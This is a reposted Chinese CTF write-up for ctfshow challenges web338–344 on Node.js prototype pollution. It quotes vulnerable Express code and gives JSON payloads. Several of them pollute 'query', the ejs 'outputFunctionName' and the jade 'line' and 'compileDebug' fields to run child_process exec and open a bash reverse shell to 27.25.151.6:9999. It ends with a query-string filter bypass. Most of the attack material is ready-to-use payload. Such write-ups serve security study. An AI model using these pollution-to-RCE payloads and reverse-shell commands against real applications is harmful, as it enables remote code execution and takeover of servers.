ctfshow web入門 web338--web344

web338

原型鏈污染

comman.js

module.exports = {copy:copy
};function copy(object1, object2){for (let key in object2) {if (key in object2 && key in object1) {copy(object1[key], object2[key])} else {object1[key] = object2[key]}}}

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');var flag='flag_here';var secert = {};var sess = req.session;let user = {};utils.copy(user,req.body);if(secert.ctfshow==='36dboy'){res.end(flag);}else{return res.json({ret_code: 2, ret_msg: '登錄失敗'+JSON.stringify(user)});  }});module.exports = router;

我們知道沒有對象都有一個原生屬性就是__proto__然后我們利用這個來使用copy來實現屬性的污染把，secret的ctfshow屬性變為36dboy

POST:
{"__proto__":{"ctfshow":"36dboy"}}

在這里插入圖片描述

然后發包就行

web339

原型鏈污染覆蓋 query 實現命令執行

app.js:

var indexRouter = require('./routes/index');
var loginRouter = require('./routes/login');
var apiRouter = require('./routes/api');

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');function User(){this.username='';this.password='';
}
function normalUser(){this.user
}/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');var flag='flag_here';var secert = {};var sess = req.session;let user = {};utils.copy(user,req.body);if(secert.ctfshow===flag){res.end(flag);}else{return res.json({ret_code: 2, ret_msg: '登錄失敗'+JSON.stringify(user)});  }});module.exports = router;

api.js

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');res.render('api', { query: Function(query)(query)});});module.exports = router;

res.render('api', { query: Function(query)(query)});
query屬性并且想把這個屬性變成函數然后再直接調用這個函數

我們利用這個來覆蓋query進行RCE

Function環境下沒有require函數，不能獲得child_process模塊，我們可以通過使用process.mainModule.constructor._load來代替require。

在這里插入圖片描述

{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"')"}}

然后使得api起反應，那么函數就會被調用了
在這里插入圖片描述

在這里插入圖片描述

由于是污染題，所以我靶機是開了差不多十來次，終于是拿到了
在這里插入圖片描述
最后翻到了flag

web340

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');var flag='flag_here';var user = new function(){this.userinfo = new function(){this.isVIP = false;this.isAdmin = false;this.isAuthor = false;     };}utils.copy(user.userinfo,req.body);if(user.userinfo.isAdmin){res.end(flag);}else{return res.json({ret_code: 2, ret_msg: '登錄失敗'});  }});module.exports = router;

用我們發送的請求(req.body)覆蓋user.userinfo的屬性為真
而我們要污染到object的話就要兩層才能達到因為
userinfo上層為user，user的上層為object

{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"')"}}}

發包然后觸發即可
在這里插入圖片描述

web341

ejs 原型鏈污染 RCE

源碼和340沒有變，但是沒有api的函數觸發了
首先一樣的雙層污染
用snyk測一下先發現有ejs的

{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"');var __tmp2"}}}

這里的前面的 _tmp1; 和后面的 var __tmp2 不能刪，是為了閉合代碼。
在這里插入圖片描述
污染之后沒有反應，隨便訪問一個頁面，反彈成功

根目錄下面找到flag

web342–web343

jade 原型鏈污染 rce

{"__proto__":{"__proto__": {"type":"Code","compileDebug":true,"self":true,"line":"0, \"\" ));return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"');//"}}}{"__proto__":{"__proto__":{"compileDebug":1,"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"')"}}}

在這里插入圖片描述
這里有些師傅反彈不到，可能是一個細節res接受JSON

而在是在login發包，你如果原地發會報錯

web344

router.get('/', function(req, res, next) {res.type('html');var flag = 'flag_here';if(req.url.match(/8c|2c|\,/ig)){res.end('where is flag :)');}var query = JSON.parse(req.query.query);   if(query.name==='admin'&&query.password==='ctfshow'&&query.isVIP===true){res.end(flag);}else{res.end('where is flag. :)');}});

過濾了8c 2c ,

var query = JSON.parse(req.query.query);   
定義了一個js對象，訪問其參數值

直接傳就行了

?query={"name":"admin"&query="password":"%63tfshow"&query="isVIP":true}
考慮一下繞過

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/diannao/42031.shtml
繁體地址，請注明出處：http://hk.pswp.cn/diannao/42031.shtml
英文地址，請注明出處：http://en.pswp.cn/diannao/42031.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！